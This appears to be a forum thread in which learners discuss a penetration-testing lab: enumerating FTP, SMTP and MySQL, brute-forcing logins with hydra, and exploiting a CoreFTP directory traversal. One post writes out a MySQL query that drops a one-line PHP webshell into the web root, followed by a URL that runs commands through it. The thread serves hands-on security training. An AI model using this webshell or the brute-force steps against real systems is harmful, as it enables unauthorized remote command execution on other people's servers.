This one was quite a mess. You see so many opportunities that your head spinning in every directions. After some time, i decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):
I’m stuck on how to obtain the first credentials.
I have done the following:
Enumerate FTP with anonymous, doesn’t accept.
Enumerate SMTP users with mode RCPT, and find one f****.
Tried to brute force this user on SMTP and FTP using hydra and a bunch of different password lists, including the pws.list from module resources, including rockyou.txt over all time of target server is alive.
The MySQL doesn’t also accept undefined user or anonymous concept for login.
I’ve not explore the port 80 for the HTML content, because it gets out of the scope of this module, even more for an easy lab.
I’ve been days on this, can someone help me? Thank you.
Can someone give me some advice, I have entered mysql with the credentials f*** and the pass 9***, but within it I understand that I must upload a file, or how can I do it, I need some advice I am stuck.
Hi. I am found the credentials and was able to insert a PHP shell using MySQL: SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';
I am trying to access the file in the browser using the parameter https://10.129.196.82/webshell.php?c=dir, but nothing happens. Could someone help me?